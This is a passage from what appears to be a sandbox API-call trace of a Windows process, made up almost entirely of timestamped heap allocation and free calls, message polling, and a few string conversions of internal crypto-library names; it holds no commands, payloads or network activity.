lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0242.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0242.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0242.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0242.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0242.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0242.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0242.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0242.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0242.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0242.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0242.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0242.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0242.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0242.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0242.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0242.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0242.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0242.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0242.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0242.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0242.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0242.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978518 | out: hHeap=0x970000) returned 1 [0242.349] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551d8 [0242.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552a8 [0242.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552d8 [0242.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0242.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0242.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0242.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0242.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0242.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0242.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0242.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0242.349] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0242.349] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55208 [0242.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0242.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0242.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0242.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0242.350] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0242.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0242.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0242.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0242.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0242.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0242.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0242.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0242.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0242.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0242.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0242.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0242.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0242.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc398) returned 0x2e80330 [0242.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0242.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0242.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0242.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0242.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0242.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0242.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0242.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0242.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0242.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0242.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0242.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0242.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc398) returned 0x2e8c6d0 [0242.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0242.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0242.352] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0242.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0242.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0242.352] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0242.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0242.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0242.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0242.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0242.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0242.353] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0242.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0242.353] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0242.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0242.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0242.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0242.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0242.353] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0242.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0242.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0242.353] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0242.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0242.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0242.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51268 [0242.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0242.353] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0242.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0242.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0242.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0242.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0242.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0242.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0242.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0242.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0242.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0242.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51280 [0242.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0242.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0242.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0242.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0242.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0242.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0242.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0242.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51238 [0242.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0242.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0242.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0242.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0242.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0242.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0242.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0242.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0242.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0242.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0242.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0242.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0242.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0242.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0242.354] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0242.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0242.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0242.355] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0242.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0242.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0242.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0242.355] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0242.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0242.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0242.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51118 [0242.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0242.355] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0242.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0242.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0242.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0242.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0242.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0242.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0242.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0242.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0242.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0242.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0242.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0242.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0242.355] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0242.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0242.355] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0242.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0242.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0242.355] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0242.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0242.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0242.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0242.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0242.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0242.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0242.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0242.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0242.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0242.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0242.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc398) returned 0x2e80330 [0242.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0242.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0242.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc398) returned 0x2e98a70 [0242.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0242.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0242.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0242.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0242.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0242.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0242.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0242.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0242.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc398) returned 0x2e80330 [0242.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e98a70 | out: hHeap=0x970000) returned 1 [0242.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0242.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0242.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc398) returned 0x2e98a70 [0242.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0242.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0242.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0242.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0242.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0242.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0242.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0242.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0242.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0242.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0242.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0242.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0242.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0242.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0242.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0242.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0242.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0242.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0242.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0242.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0242.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0242.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0242.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0242.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0242.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0242.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0242.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0242.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0242.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0242.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0242.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0242.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) 